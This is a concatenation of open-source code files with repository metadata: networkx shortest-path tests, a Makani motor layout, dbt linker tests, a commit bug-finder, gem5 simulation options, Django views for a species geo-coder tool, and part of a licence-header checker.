1: 1, 2: -2, 3: -1, 4: 0})) assert (nx.goldberg_radzik(G, 0) == ({0: None, 1: 0, 2: 1, 3: 2, 4: 3}, {0: 0, 1: 1, 2: -2, 3: -1, 4: 0})) def test_not_connected(self): G = nx.complete_graph(6) G.add_edge(10, 11) G.add_edge(10, 12) assert (nx.single_source_bellman_ford_path(G, 0) == {0: [0], 1: [0, 1], 2: [0, 2], 3: [0, 3], 4: [0, 4], 5: [0, 5]}) assert (nx.single_source_bellman_ford_path_length(G, 0) == {0: 0, 1: 1, 2: 1, 3: 1, 4: 1, 5: 1}) assert (nx.single_source_bellman_ford(G, 0) == ({0: 0, 1: 1, 2: 1, 3: 1, 4: 1, 5: 1}, {0: [0], 1: [0, 1], 2: [0, 2], 3: [0, 3], 4: [0, 4], 5: [0, 5]})) assert (nx.bellman_ford_predecessor_and_distance(G, 0) == ({0: [], 1: [0], 2: [0], 3: [0], 4: [0], 5: [0]}, {0: 0, 1: 1, 2: 1, 3: 1, 4: 1, 5: 1})) assert (nx.goldberg_radzik(G, 0) == ({0: None, 1: 0, 2: 0, 3: 0, 4: 0, 5: 0}, {0: 0, 1: 1, 2: 1, 3: 1, 4: 1, 5: 1})) # not connected, with a component not containing the source that # contains a negative cost cycle. G = nx.complete_graph(6) G.add_edges_from([('A', 'B', {'load': 3}), ('B', 'C', {'load': -10}), ('C', 'A', {'load': 2})]) assert (nx.single_source_bellman_ford_path(G, 0, weight='load') == {0: [0], 1: [0, 1], 2: [0, 2], 3: [0, 3], 4: [0, 4], 5: [0, 5]}) assert (nx.single_source_bellman_ford_path_length(G, 0, weight='load') == {0: 0, 1: 1, 2: 1, 3: 1, 4: 1, 5: 1}) assert (nx.single_source_bellman_ford(G, 0, weight='load') == ({0: 0, 1: 1, 2: 1, 3: 1, 4: 1, 5: 1}, {0: [0], 1: [0, 1], 2: [0, 2], 3: [0, 3], 4: [0, 4], 5: [0, 5]})) assert (nx.bellman_ford_predecessor_and_distance(G, 0, weight='load') == ({0: [], 1: [0], 2: [0], 3: [0], 4: [0], 5: [0]}, {0: 0, 1: 1, 2: 1, 3: 1, 4: 1, 5: 1})) assert (nx.goldberg_radzik(G, 0, weight='load') == ({0: None, 1: 0, 2: 0, 3: 0, 4: 0, 5: 0}, {0: 0, 1: 1, 2: 1, 3: 1, 4: 1, 5: 1})) def test_multigraph(self): assert nx.bellman_ford_path(self.MXG, 's', 'v') == ['s', 'x', 'u', 'v'] assert nx.bellman_ford_path_length(self.MXG, 's', 'v') == 9 assert nx.single_source_bellman_ford_path(self.MXG, 's')['v'] == ['s', 'x', 'u', 'v'] assert nx.single_source_bellman_ford_path_length(self.MXG, 's')['v'] == 9 D, P = nx.single_source_bellman_ford(self.MXG, 's', target='v') assert D == 9 assert P == ['s', 'x', 'u', 'v'] P, D = nx.bellman_ford_predecessor_and_distance(self.MXG, 's') assert P['v'] == ['u'] assert D['v'] == 9 P, D = nx.goldberg_radzik(self.MXG, 's') assert P['v'] == 'u' assert D['v'] == 9 assert nx.bellman_ford_path(self.MXG4, 0, 2) == [0, 1, 2] assert nx.bellman_ford_path_length(self.MXG4, 0, 2) == 4 assert nx.single_source_bellman_ford_path(self.MXG4, 0)[2] == [0, 1, 2] assert nx.single_source_bellman_ford_path_length(self.MXG4, 0)[2] == 4 D, P = nx.single_source_bellman_ford(self.MXG4, 0, target=2) assert D == 4 assert P == [0, 1, 2] P, D = nx.bellman_ford_predecessor_and_distance(self.MXG4, 0) assert P[2] == [1] assert D[2] == 4 P, D = nx.goldberg_radzik(self.MXG4, 0) assert P[2] == 1 assert D[2] == 4 def test_others(self): assert nx.bellman_ford_path(self.XG, 's', 'v') == ['s', 'x', 'u', 'v'] assert nx.bellman_ford_path_length(self.XG, 's', 'v') == 9 assert nx.single_source_bellman_ford_path(self.XG, 's')['v'] == ['s', 'x', 'u', 'v'] assert nx.single_source_bellman_ford_path_length(self.XG, 's')['v'] == 9 D, P = nx.single_source_bellman_ford(self.XG, 's', target='v') assert D == 9 assert P == ['s', 'x', 'u', 'v'] (P, D) = nx.bellman_ford_predecessor_and_distance(self.XG, 's') assert P['v'] == ['u'] assert D['v'] == 9 (P, D) = nx.goldberg_radzik(self.XG, 's') assert P['v'] == 'u' assert D['v'] == 9 def test_path_graph(self): G = nx.path_graph(4) assert (nx.single_source_bellman_ford_path(G, 0) == {0: [0], 1: [0, 1], 2: [0, 1, 2], 3: [0, 1, 2, 3]}) assert (nx.single_source_bellman_ford_path_length(G, 0) == {0: 0, 1: 1, 2: 2, 3: 3}) assert (nx.single_source_bellman_ford(G, 0) == ({0: 0, 1: 1, 2: 2, 3: 3}, {0: [0], 1: [0, 1], 2: [0, 1, 2], 3: [0, 1, 2, 3]})) assert (nx.bellman_ford_predecessor_and_distance(G, 0) == ({0: [], 1: [0], 2: [1], 3: [2]}, {0: 0, 1: 1, 2: 2, 3: 3})) assert (nx.goldberg_radzik(G, 0) == ({0: None, 1: 0, 2: 1, 3: 2}, {0: 0, 1: 1, 2: 2, 3: 3})) assert (nx.single_source_bellman_ford_path(G, 3) == {0: [3, 2, 1, 0], 1: [3, 2, 1], 2: [3, 2], 3: [3]}) assert (nx.single_source_bellman_ford_path_length(G, 3) == {0: 3, 1: 2, 2: 1, 3: 0}) assert (nx.single_source_bellman_ford(G, 3) == ({0: 3, 1: 2, 2: 1, 3: 0}, {0: [3, 2, 1, 0], 1: [3, 2, 1], 2: [3, 2], 3: [3]})) assert (nx.bellman_ford_predecessor_and_distance(G, 3) == ({0: [1], 1: [2], 2: [3], 3: []}, {0: 3, 1: 2, 2: 1, 3: 0})) assert (nx.goldberg_radzik(G, 3) == ({0: 1, 1: 2, 2: 3, 3: None}, {0: 3, 1: 2, 2: 1, 3: 0})) def test_4_cycle(self): # 4-cycle G = nx.Graph([(0, 1), (1, 2), (2, 3), (3, 0)]) dist, path = nx.single_source_bellman_ford(G, 0) assert dist == {0: 0, 1: 1, 2: 2, 3: 1} assert path[0] == [0] assert path[1] == [0, 1] assert path[2] in [[0, 1, 2], [0, 3, 2]] assert path[3] == [0, 3] pred, dist = nx.bellman_ford_predecessor_and_distance(G, 0) assert pred[0] == [] assert pred[1] == [0] assert pred[2] in [[1, 3], [3, 1]] assert pred[3] == [0] assert dist == {0: 0, 1: 1, 2: 2, 3: 1} pred, dist = nx.goldberg_radzik(G, 0) assert pred[0] == None assert pred[1] == 0 assert pred[2] in [1, 3] assert pred[3] == 0 assert dist == {0: 0, 1: 1, 2: 2, 3: 1} def test_negative_weight(self): G = nx.DiGraph() G.add_nodes_from('abcd') G.add_edge('a','d', weight = 0) G.add_edge('a','b', weight = 1) G.add_edge('b','c', weight = -3) G.add_edge('c','d', weight = 1) assert nx.bellman_ford_path(G, 'a', 'd') == ['a', 'b', 'c', 'd'] assert nx.bellman_ford_path_length(G, 'a', 'd') == -1 class TestJohnsonAlgorithm(WeightedTestBase): def test_single_node_graph(self): with pytest.raises(nx.NetworkXError): G = nx.DiGraph() G.add_node(0) nx.johnson(G) def test_negative_cycle(self): G = nx.DiGraph() G.add_weighted_edges_from([('0', '3', 3), ('0', '1', -5), ('1', '0', -5), ('0', '2', 2), ('1', '2', 4), ('2', '3', 1)]) pytest.raises(nx.NetworkXUnbounded, nx.johnson, G) G = nx.Graph() G.add_weighted_edges_from([('0', '3', 3), ('0', '1', -5), ('1', '0', -5), ('0', '2', 2), ('1', '2', 4), ('2', '3', 1)]) pytest.raises(nx.NetworkXUnbounded, nx.johnson, G) def test_negative_weights(self): G = nx.DiGraph() G.add_weighted_edges_from([('0', '3', 3), ('0', '1', -5), ('0', '2', 2), ('1', '2', 4), ('2', '3', 1)]) paths = nx.johnson(G) assert paths == {'1': {'1': ['1'], '3': ['1', '2', '3'], '2': ['1', '2']}, '0': {'1': ['0', '1'], '0': ['0'], '3': ['0', '1', '2', '3'], '2': ['0', '1', '2']}, '3': {'3': ['3']}, '2': {'3': ['2', '3'], '2': ['2']}} def test_unweighted_graph(self): with pytest.raises(nx.NetworkXError): G = nx.path_graph(5) nx.johnson(G) def test_graphs(self): validate_path(self.XG, 's', 'v', 9, nx.johnson(self.XG)['s']['v']) validate_path(self.MXG, 's', 'v', 9, nx.johnson(self.MXG)['s']['v']) validate_path(self.XG2, 1, 3, 4, nx.johnson(self.XG2)[1][3]) validate_path(self.XG3, 0, 3, 15, nx.johnson(self.XG3)[0][3]) validate_path(self.XG4, 0, 2, 4, nx.johnson(self.XG4)[0][2]) validate_path(self.MXG4, 0, 2, 4, nx.johnson(self.MXG4)[0][2])
mit
-4,608,623,554,818,168,000
44.279869
100
0.493855
false
google/makani
gs/monitor2/apps/plugins/layouts/motor_layout.py
1
2241
# Copyright 2020 Makani Technologies LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Layout to monitor motors.""" from makani.gs.monitor2.apps.layout import base from makani.gs.monitor2.apps.plugins import common from makani.gs.monitor2.apps.plugins.indicators import motor class MotorLayout(base.BaseLayout): """Layout to monitor motors.""" _NAME = 'Motors' _DESIRED_VIEW_COLS = 2 _MODE = common.FULL_COMMS_MODE def Initialize(self): # Define how motors should be grouped, each group renders a chart. self._motor_groups = { 'PTO/SBO': ['Pto', 'Sbo'], 'PBO/STO': ['Pbo', 'Sto'], 'PTI/SBI': ['Pti', 'Sbi'], 'PBI/STI': ['Pbi', 'Sti'], } self._AddIndicators('Status', [ motor.AioUpdateIndicator(self._MODE), motor.ArmedIndicator(self._MODE), motor.ErrorIndicator(self._MODE), motor.WarningIndicator(self._MODE), motor.MotorBusVoltageIndicator(self._MODE), ]) self._AddIndicators('Temperatures', [ motor.BoardTemperatureIndicator(self._MODE), motor.HeatPlateTemperatureIndicator(self._MODE), motor.StatorCoreTemperatureIndicator(self._MODE), motor.WindingTemperatureIndicator(self._MODE), ]) self._AddIndicators('Warning and error printout', [ motor.MotorFlagNameIndicator(self._MODE, 'Warnings'), motor.MotorFlagNameIndicator(self._MODE, 'Errors'), ]) self._UpdateProperties('Warning and error printout', {'cols': 2}) self._AddIndicators('Speed', [ motor.SpeedStackingChart(self._MODE, group_name, motor_short_names) for group_name, motor_short_names in self._motor_groups.iteritems()]) self._UpdateProperties('Speed', {'cols': 2})
apache-2.0
-8,440,971,093,229,201,000
34.015625
77
0.685408
false
fishtown-analytics/dbt
test/unit/test_linker.py
1
6077
import os import tempfile import unittest from unittest import mock from dbt import linker try: from queue import Empty except ImportError: from Queue import Empty def _mock_manifest(nodes): manifest = mock.MagicMock(nodes={ n: mock.MagicMock(unique_id=n) for n in nodes }) manifest.expect.side_effect = lambda n: mock.MagicMock(unique_id=n) return manifest class LinkerTest(unittest.TestCase): def setUp(self): self.patcher = mock.patch.object(linker, 'is_blocking_dependency') self.is_blocking_dependency = self.patcher.start() self.is_blocking_dependency.return_value = True self.linker = linker.Linker() def tearDown(self): self.patcher.stop() def test_linker_add_node(self): expected_nodes = ['A', 'B', 'C'] for node in expected_nodes: self.linker.add_node(node) actual_nodes = self.linker.nodes() for node in expected_nodes: self.assertIn(node, actual_nodes) self.assertEqual(len(actual_nodes), len(expected_nodes)) def test_linker_write_and_read_graph(self): expected_nodes = ['A', 'B', 'C'] for node in expected_nodes: self.linker.add_node(node) manifest = _mock_manifest('ABC') (fd, fname) = tempfile.mkstemp() os.close(fd) try: self.linker.write_graph(fname, manifest) new_linker = linker.from_file(fname) finally: os.unlink(fname) actual_nodes = new_linker.nodes() for node in expected_nodes: self.assertIn(node, actual_nodes) self.assertEqual(len(actual_nodes), len(expected_nodes)) def assert_would_join(self, queue): """test join() without timeout risk""" self.assertEqual(queue.inner.unfinished_tasks, 0) def test_linker_add_dependency(self): actual_deps = [('A', 'B'), ('A', 'C'), ('B', 'C')] for (l, r) in actual_deps: self.linker.dependency(l, r) manifest = _mock_manifest('ABC') queue = self.linker.as_graph_queue(manifest) got = queue.get(block=False) self.assertEqual(got.unique_id, 'C') with self.assertRaises(Empty): queue.get(block=False) self.assertFalse(queue.empty()) queue.mark_done('C') self.assertFalse(queue.empty()) got = queue.get(block=False) self.assertEqual(got.unique_id, 'B') with self.assertRaises(Empty): queue.get(block=False) self.assertFalse(queue.empty()) queue.mark_done('B') self.assertFalse(queue.empty()) got = queue.get(block=False) self.assertEqual(got.unique_id, 'A') with self.assertRaises(Empty): queue.get(block=False) self.assertTrue(queue.empty()) queue.mark_done('A') self.assert_would_join(queue) self.assertTrue(queue.empty()) def test_linker_add_disjoint_dependencies(self): actual_deps = [('A', 'B')] additional_node = 'Z' for (l, r) in actual_deps: self.linker.dependency(l, r) self.linker.add_node(additional_node) manifest = _mock_manifest('ABZ') queue = self.linker.as_graph_queue(manifest) # the first one we get must be B, it has the longest dep chain first = queue.get(block=False) self.assertEqual(first.unique_id, 'B') self.assertFalse(queue.empty()) queue.mark_done('B') self.assertFalse(queue.empty()) second = queue.get(block=False) self.assertIn(second.unique_id, {'A', 'Z'}) self.assertFalse(queue.empty()) queue.mark_done(second.unique_id) self.assertFalse(queue.empty()) third = queue.get(block=False) self.assertIn(third.unique_id, {'A', 'Z'}) with self.assertRaises(Empty): queue.get(block=False) self.assertNotEqual(second.unique_id, third.unique_id) self.assertTrue(queue.empty()) queue.mark_done(third.unique_id) self.assert_would_join(queue) self.assertTrue(queue.empty()) def test_linker_dependencies_limited_to_some_nodes(self): actual_deps = [('A', 'B'), ('B', 'C'), ('C', 'D')] for (l, r) in actual_deps: self.linker.dependency(l, r) queue = self.linker.as_graph_queue(_mock_manifest('ABCD'), ['B']) got = queue.get(block=False) self.assertEqual(got.unique_id, 'B') self.assertTrue(queue.empty()) queue.mark_done('B') self.assert_would_join(queue) queue_2 = self.linker.as_graph_queue(_mock_manifest('ABCD'), ['A', 'B']) got = queue_2.get(block=False) self.assertEqual(got.unique_id, 'B') self.assertFalse(queue_2.empty()) with self.assertRaises(Empty): queue_2.get(block=False) queue_2.mark_done('B') self.assertFalse(queue_2.empty()) got = queue_2.get(block=False) self.assertEqual(got.unique_id, 'A') self.assertTrue(queue_2.empty()) with self.assertRaises(Empty): queue_2.get(block=False) self.assertTrue(queue_2.empty()) queue_2.mark_done('A') self.assert_would_join(queue_2) def test_linker_bad_limit_throws_runtime_error(self): actual_deps = [('A', 'B'), ('B', 'C'), ('C', 'D')] for (l, r) in actual_deps: self.linker.dependency(l, r) with self.assertRaises(RuntimeError): self.linker.as_graph_queue(_mock_manifest('ABCD'), ['ZZZ']) def test__find_cycles__cycles(self): actual_deps = [('A', 'B'), ('B', 'C'), ('C', 'A')] for (l, r) in actual_deps: self.linker.dependency(l, r) self.assertIsNotNone(self.linker.find_cycles()) def test__find_cycles__no_cycles(self): actual_deps = [('A', 'B'), ('B', 'C'), ('C', 'D')] for (l, r) in actual_deps: self.linker.dependency(l, r) self.assertIsNone(self.linker.find_cycles())
apache-2.0
-9,025,431,726,065,684,000
30.984211
80
0.586803
false
bumper-app/bumper-bianca
bianca/analyzer/bugfinder.py
1
3624
""" file: bugfinder.py author: Christoffer Rosen <cbr4830@rit.edu> date: November 2013 description: Links changes that introduces bugs by identifying changes that fix problems. """ import re from orm.commit import * from caslogging import logging from analyzer.git_commit_linker import * import json class BugFinder: """ BugFinder(): description: Links changes that introduces bugs. """ def __init__(self, allCommits, correctiveCommits, issueTracker): """ Constructor @param commits: All commits in ascending order by date @param correctiveCommits: All commits/changes which are identified as fixing problems. @param issueTracker: Issue tracker (e.g., GitHub Issues) """ self.allCommits = allCommits self.correctiveCommits = correctiveCommits self.issueTracker = issueTracker def findIssueOpened(self, correctiveCommit): """ findIssueIds() If the corrective change/commit links to a issue in the issue tracker, returns the date of oldest open issue found otherwise returns none """ issue_opened = None if(self.issueTracker is None or hasattr(self.issueTracker, "getDateOpened") == False): return None idMatch = re.compile('#[\d]+') issue_ids = idMatch.findall(correctiveCommit.commit_message) issue_ids = [issue_id.strip('#') for issue_id in issue_ids] # Remove the '#' from ids if len(issue_ids) > 0: issue_opened = self.issueTracker.getDateOpened(issue_ids[0]) # Use the oldest open bug for issue_id in issue_ids: logging.info('Searching for issue id: ' + issue_id) curr_issue_opened = self.issueTracker.getDateOpened(issue_id) # Verify that an issue was found. if curr_issue_opened is not None: if int(curr_issue_opened) < int(issue_opened): issue_opened = curr_issue_opened return issue_opened def searchForBuggyCommit(self, correctiveCommit): """ Finds the buggy commit based on the bug fixing commit Helper method for markBuggyCommits. If commir links to an issue tracker, we check files changed prior to this date. Otherwise, me only check date prior to the fix. @param correctiveCommits: the bug fixing commit """ bug_introduced_prior = correctiveCommit.author_date_unix_timestamp issue_opened = self.findIssueOpened(correctiveCommit) if issue_opened is not None: bug_introduced_prior = issue_opened if 'CAS_DELIMITER' in correctiveCommit.fileschanged: # Provide legacy support for the previous fileschanged format correctiveFiles = correctiveCommit.fileschanged.split(",CAS_DELIMITER,") else: correctiveFiles = json.loads(correctiveCommit.fileschanged) for commit in self.allCommits: if int(commit.author_date_unix_timestamp) < int(bug_introduced_prior): if 'CAS_DELIMITER' in commit.fileschanged: # Provide legacy support for the previous fileschanged format commitFiles = commit.fileschanged.split(",CAS_DELIMITER,") else: commitFiles = json.loads(commit.fileschanged) for commitFile in commitFiles: # This introudced the bug! if commitFile in correctiveFiles: return commit return -1 # Not found def markBuggyCommits(self): """ Finds bug inducing commits based on those that are bug fixing. It checks commits prior to this and determines it to be bug inducing if it changes the same file in a bug fixing commit """ for correctiveCommit in self.correctiveCommits: buggyCommit = self.searchForBuggyCommit(correctiveCommit) if buggyCommit is not -1: buggyCommit.contains_bug = True #else: #print("Cound not find the bug inducing commit for: " + # correctiveCommit.commit_message)
mit
9,136,406,733,710,434,000
30.241379
88
0.737307
false
danielpalomino/gem5
configs/common/Options.py
1
10060
# Copyright (c) 2006-2008 The Regents of The University of Michigan # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer; # redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution; # neither the name of the copyright holders nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. # # Authors: Lisa Hsu import m5 from m5.defines import buildEnv from m5.objects import * from Benchmarks import * def addCommonOptions(parser): # system options parser.add_option("--cpu-type", type="choice", default="atomic", choices = ["atomic", "timing", "detailed", "inorder", "arm_detailed"], help = "type of cpu to run with") parser.add_option("--checker", action="store_true"); parser.add_option("-n", "--num-cpus", type="int", default=1) parser.add_option("--caches", action="store_true") parser.add_option("--l2cache", action="store_true") parser.add_option("--fastmem", action="store_true") parser.add_option("--clock", action="store", type="string", default='2GHz') parser.add_option("--num-dirs", type="int", default=1) parser.add_option("--num-l2caches", type="int", default=1) parser.add_option("--num-l3caches", type="int", default=1) parser.add_option("--l1d_size", type="string", default="64kB") parser.add_option("--l1i_size", type="string", default="32kB") parser.add_option("--l2_size", type="string", default="2MB") parser.add_option("--l3_size", type="string", default="16MB") parser.add_option("--l1d_assoc", type="int", default=2) parser.add_option("--l1i_assoc", type="int", default=2) parser.add_option("--l2_assoc", type="int", default=8) parser.add_option("--l3_assoc", type="int", default=16) parser.add_option("--cacheline_size", type="int", default=64) parser.add_option("--ruby", action="store_true") # Run duration options parser.add_option("-m", "--maxtick", type="int", default=m5.MaxTick, metavar="T", help="Stop after T ticks") parser.add_option("--maxtime", type="float") parser.add_option("-I", "--maxinsts", action="store", type="int", default=None, help="""Total number of instructions to simulate (default: run forever)""") parser.add_option("--work-item-id", action="store", type="int", help="the specific work id for exit & checkpointing") parser.add_option("--work-begin-cpu-id-exit", action="store", type="int", help="exit when work starts on the specified cpu") parser.add_option("--work-end-exit-count", action="store", type="int", help="exit at specified work end count") parser.add_option("--work-begin-exit-count", action="store", type="int", help="exit at specified work begin count") parser.add_option("--init-param", action="store", type="int", default=0, help="""Parameter available in simulation with m5 initparam""") # Checkpointing options ###Note that performing checkpointing via python script files will override ###checkpoint instructions built into binaries. parser.add_option("--take-checkpoints", action="store", type="string", help="<M,N> will take checkpoint at cycle M and every N cycles thereafter") parser.add_option("--max-checkpoints", action="store", type="int", help="the maximum number of checkpoints to drop", default=5) parser.add_option("--checkpoint-dir", action="store", type="string", help="Place all checkpoints in this absolute directory") parser.add_option("-r", "--checkpoint-restore", action="store", type="int", help="restore from checkpoint <N>") parser.add_option("--checkpoint-at-end", action="store_true", help="take a checkpoint at end of run") parser.add_option("--work-begin-checkpoint-count", action="store", type="int", help="checkpoint at specified work begin count") parser.add_option("--work-end-checkpoint-count", action="store", type="int", help="checkpoint at specified work end count") parser.add_option("--work-cpus-checkpoint-count", action="store", type="int", help="checkpoint and exit when active cpu count is reached") parser.add_option("--restore-with-cpu", action="store", type="choice", default="atomic", choices = ["atomic", "timing", "detailed", "inorder"], help = "cpu type for restoring from a checkpoint") # CPU Switching - default switch model goes from a checkpoint # to a timing simple CPU with caches to warm up, then to detailed CPU for # data measurement parser.add_option("--repeat-switch", action="store", type="int", default=None, help="switch back and forth between CPUs with period <N>") parser.add_option("-s", "--standard-switch", action="store", type="int", default=None, help="switch from timing to Detailed CPU after warmup period of <N>") parser.add_option("-p", "--prog-interval", type="int", help="CPU Progress Interval") # Fastforwarding and simpoint related materials parser.add_option("-W", "--warmup-insts", action="store", type="int", default=None, help="Warmup period in total instructions (requires --standard-switch)") parser.add_option("--bench", action="store", type="string", default=None, help="base names for --take-checkpoint and --checkpoint-restore") parser.add_option("-F", "--fast-forward", action="store", type="string", default=None, help="Number of instructions to fast forward before switching") parser.add_option("-S", "--simpoint", action="store_true", default=False, help="""Use workload simpoints as an instruction offset for --checkpoint-restore or --take-checkpoint.""") parser.add_option("--at-instruction", action="store_true", default=False, help="""Treat value of --checkpoint-restore or --take-checkpoint as a number of instructions.""") def addSEOptions(parser): # Benchmark options parser.add_option("-c", "--cmd", default="", help="The binary to run in syscall emulation mode.") parser.add_option("-o", "--options", default="", help="""The options to pass to the binary, use " " around the entire string""") parser.add_option("-i", "--input", default="", help="Read stdin from a file.") parser.add_option("--output", default="", help="Redirect stdout to a file.") parser.add_option("--errout", default="", help="Redirect stderr to a file.") def addFSOptions(parser): # Simulation options parser.add_option("--timesync", action="store_true", help="Prevent simulated time from getting ahead of real time") # System options parser.add_option("--kernel", action="store", type="string") parser.add_option("--script", action="store", type="string") parser.add_option("--frame-capture", action="store_true", help="Stores changed frame buffers from the VNC server to compressed "\ "files in the gem5 output directory") if buildEnv['TARGET_ISA'] == "arm": parser.add_option("--bare-metal", action="store_true", help="Provide the raw system without the linux specific bits") parser.add_option("--machine-type", action="store", type="choice", choices=ArmMachineType.map.keys(), default="RealView_PBX") # Benchmark options parser.add_option("--dual", action="store_true", help="Simulate two systems attached with an ethernet link") parser.add_option("-b", "--benchmark", action="store", type="string", dest="benchmark", help="Specify the benchmark to run. Available benchmarks: %s"\ % DefinedBenchmarks) # Metafile options parser.add_option("--etherdump", action="store", type="string", dest="etherdump", help="Specify the filename to dump a pcap capture of the" \ "ethernet traffic") # Disk Image Options parser.add_option("--disk-image", action="store", type="string", default=None, help="Path to the disk image to use.") # Memory Size Options parser.add_option("--mem-size", action="store", type="string", default=None, help="Specify the physical memory size (single memory)")
bsd-3-clause
-2,901,236,696,301,935,600
54.274725
85
0.633996
false
BILS/agda
agda/species_geo_coder/views.py
1
2551
import time #from django.shortcuts import render from django.views.generic import TemplateView, FormView from django.shortcuts import redirect, render from django.db import transaction from agda.views import package_template_dict from jobs.models import (JOB_STATUS_LEVEL_ACCEPTED, JOB_STATUS_LEVEL_FINISHED, get_job_or_404) from species_geo_coder.models import app_package, SpeciesGeoCoderJob from species_geo_coder.forms import SpeciesGeoCoderForm from species_geo_coder.models import tool_1 # Create your views here. class IndexView(TemplateView): template_name = 'species_geo_coder/index.html' def get_context_data(self, *args, **kw): context = super(IndexView, self).get_context_data(**kw) return package_template_dict(self.request, app_package, *args, **kw) class ToolView(FormView): template_name = 'species_geo_coder/speciesgeocoder.html' form_class = SpeciesGeoCoderForm @transaction.atomic def form_valid(self, form): request = self.request ## These are all generic, should be extracted to a main class job = SpeciesGeoCoderJob(status=JOB_STATUS_LEVEL_ACCEPTED) job.save() job = SpeciesGeoCoderJob.objects.select_for_update().get(pk=job.id) job.log_create(request.user, 'Created in web interface.') verbose = form.cleaned_data['verbose'] occurences = form.cleaned_data['occurences'] plot = form.cleaned_data['plot'] job.submit(request.user, request.META['REMOTE_ADDR'], form.cleaned_data['name'], self.request.FILES, occurences, verbose, plot) return redirect('jobs.views.show_results', job.slug) @transaction.atomic def tool_1_results(request, slug): job = get_job_or_404(slug=slug, select_for_update=True) job.update_status(request.user) params = dict(job=job, tool=tool_1) if job.is_alive: reload_time, interval = request.session.setdefault('mdrscan', dict()).pop(job.slug, (0, 5)) if reload_time <= time.time(): reload_time = max(time.time() + 5, reload_time + interval) interval *= 2 request.session['mdrscan'][job.slug] = (reload_time, interval) request.session.modified = True params.update(timeout=reload_time - time.time()) params.update(reload_time=reload_time, interval=interval) return render(request, 'species_geo_coder/results.html', params) #class ToolResultView(TemplateView): # template_name = '<app>/tool_result.html'
mit
1,003,078,452,284,598,300
38.246154
99
0.681693
false
lowRISC/manticore
util/license-checker.py
2
17721
#!/usr/bin/env python3 # # Copyright lowRISC contributors. # Licensed under the Apache License, Version 2.0, see LICENSE for details. # SPDX-License-Identifier: Apache-2.0 import argparse import fnmatch import logging import re import subprocess from pathlib import Path from types import SimpleNamespace import hjson from tabulate import tabulate class LicenceHeader(object): """Represents the licence header we want to insert""" def __init__(self, text): self._lines = text.strip().splitlines() def __getitem__(self, idx): return self._lines.__getitem__(idx) def __len__(self): return self._lines.__len__() def numbered_lines(self, skip=0): """Returns an iterator of (line_no, line_text). `line_no` counts from 1, and is for humans to count line numbers with. use `skip_lines` to skip enumerating the first few lines. """ return enumerate(self._lines[skip:], start=1 + skip) @property def first_word(self): (first_word, _) = self._lines[0].split(' ', 1) return first_word class CommentStyle: '''Base class for comment style objects''' def __init__(self, first_line_prefix, comment_prefix): self.first_line_prefix = first_line_prefix self.comment_prefix = comment_prefix def search_line_pattern(self, licence_first_word): return re.compile( re.escape(self.comment_prefix + ' ' + licence_first_word)) def full_line_parts(self, licence_line): return [re.escape(self.comment_prefix), licence_line] def full_line_pattern(self, licence_line): '''Returns a regex pattern which matches one line of licence text.''' return re.compile(' '.join(self.full_line_parts(licence_line))) class LineCommentStyle(CommentStyle): """Helpers for line-style comments.""" def __init__(self, prefix): super().__init__(prefix, prefix) class DifferentFirstLineCommentStyle(CommentStyle): """Some files have a different allowable prefix for their first line.""" def __init__(self, first_line_prefix, prefix): super().__init__(first_line_prefix, prefix) class BlockCommentStyle(CommentStyle): """Helpers for block-style comments.""" def __init__(self, prefix, suffix): super().__init__(prefix, prefix) self.comment_suffix = str(suffix) def full_line_parts(self, licence_line): return [ re.escape(self.comment_prefix), licence_line, re.escape(self.comment_suffix) ] SLASH_SLASH = '//' HASH = '#' SLASH_STAR = '/*' COMMENT_STYLES = { SLASH_SLASH: LineCommentStyle("//"), HASH: LineCommentStyle("#"), SLASH_STAR: BlockCommentStyle("/*", "*/"), 'corefile': DifferentFirstLineCommentStyle("CAPI=2", "#") } # (Prioritised) Mapping of file name suffixes to comment style. If the suffix # of your file does not match one of these, it will not be checked. # # Each entry is a pair (suffixes, styles). suffixes is a list of file suffixes: # if a filename matches one of these suffixes, we'll use the styles in styles. # styles is either a string or a list of strings. If there is one or more # strings, these strings must all be keys of COMMENT_STYLES and they give the # different comment styles that are acceptable for the file type. # # These rules are given in priority order. Tuples higher in the list are # matched before those later in the list, on purpose. # # Files that either do not match any extension or that have an empty list of # styles are not checked for a licence. COMMENT_CHARS = [ # Hardware Files ([".svh", ".sv", ".sv.tpl"], SLASH_SLASH), # SystemVerilog # Hardware Build Systems ([".tcl", ".sdc"], HASH), # tcl ([".core", ".core.tpl"], 'corefile'), # FuseSoC Core Files (["Makefile", ".mk"], HASH), # Makefiles ([".ys"], HASH), # Yosys script ([".waiver"], HASH), # AscentLint waiver files ([".vlt"], SLASH_SLASH), # Verilator configuration (waiver) files ([".vbl"], HASH), # Verible configuration files ([".el", ".el.tpl"], SLASH_SLASH), # Exclusion list ([".cfg", ".cfg.tpl"], [SLASH_SLASH, HASH]), # Kinds of configuration files ([".f"], []), # File lists (not checked) # The following two rules will inevitably bite us. 